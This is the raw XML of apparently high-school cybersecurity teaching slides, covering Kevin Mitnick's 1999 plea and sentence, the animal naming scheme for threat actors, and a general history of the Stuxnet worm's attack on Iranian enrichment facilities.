              <a:t>August 10, 1999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plea: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Guilty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177101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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sentence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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3 years and 10 months imprisonment, plus 3 years probation with strict limitations on use of computer equipment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Significance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The federal prosecution of computer "hacker" Kevin Mitnick was the first case to focus international attention on computer security issues.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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14374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Threat Actors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1213031"/>
            <a:ext cx="9856839" cy="532453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An entity that is partially or wholly responsible for a security incident that impacts – or has the potential to impact – an organization's security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nation-State-Based Adversaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Bear = Russia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Buffalo = Vietnam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chollima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (a mythical winged horse) = North Korea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Crane = South Korea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Kitten = Iran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Leopard = Pakistan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Panda = China</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Tiger = India</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">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fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Non-Nation-State Adversaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Jackal = Activist groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900"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Spider = Criminal groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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4166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Stuxnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1213031"/>
            <a:ext cx="9856839" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is Stuxnet?</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First emerged during the summer of 2010.</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 500-kilobyte computer worm that infiltrated numerous computer systems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Operated in 3 steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259512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Stuxnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1213031"/>
            <a:ext cx="9856839"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Analyzed and targeted Windows networks and computer systems. The worm, having infiltrated these machines, began to continually replicate itself.</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machine infiltrated the Windows-based Siemens Step7 software. This Siemens software system was and continues to be prevalent in industrial computing networks, such as nuclear enrichment facilities.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Compromising the Step7 software, the worm gained access to the industrial program logic controllers. This final step gave the worm's creators access to crucial industrial information as well as giving them the ability to operate various machinery at the individual industrial sites.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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8200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Stuxnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1213031"/>
            <a:ext cx="9856839"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Over fifteen Iranian facilities were attacked and infiltrated by the Stuxnet worm.</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It is believed that this attack was initiated by a random worker's USB drive.</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One of the affected industrial facilities was the Natanz nuclear facility.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Inspectors from the International Atomic Energy Agency visited the Natanz facility and observed that a strange number of uranium enriching centrifuges were breaking.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218729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674" y="689811"/>
            <a:ext cx="11702715" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1213031"/>
            <a:ext cx="9856839"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 2010, Iran technicians contracted computer security specialists in Belarus to examine their computer systems.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This security firm eventually discovered multiple malicious files on the Iranian computer systems.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It has subsequently revealed that these malicious files were the Stuxnet worm.</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Although Iran has not released specific details regarding the effects of the attack, it is currently estimated that the Stuxnet worm destroyed 984 uranium enriching centrifuges and constituted an estimated 30% decrease in enrichment efficiency.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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81624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oIgPCsqS"/>
  <p:tag name="ARTICULATE_DESIGN_ID_1_OFFICE THEME" val="vQGBnnSt"/>
  <p:tag name="ARTICULATE_DESIGN_ID_2_OFFICE THEME" val="bC228WYH"/>
  <p:tag name="ARTICULATE_PROJECT_OPEN" val="0"/>
  <p:tag name="ARTICULATE_SLIDE_COUNT" val="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4702</TotalTime>
  <Words>10247</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1583</Paragraphs>
  <Slides>199</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199</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="210" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Vitesse Bold</vt:lpstr>
      <vt:lpstr>Vitesse Book</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>WeTeach_CyberSecurity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Tommy Gober</cp:lastModifiedBy>
  <cp:revision>620</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-05T18:07:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-16T03:57:51Z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F58C0387-9255-46BD-B9E3-A9A1A495A3D8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ArticulatePath">
    <vt:lpwstr>WeTeach_CS_For_HS_2018SummitPresentation [Autosaved]</vt:lpwstr>
  </property>
</Properties>
</file>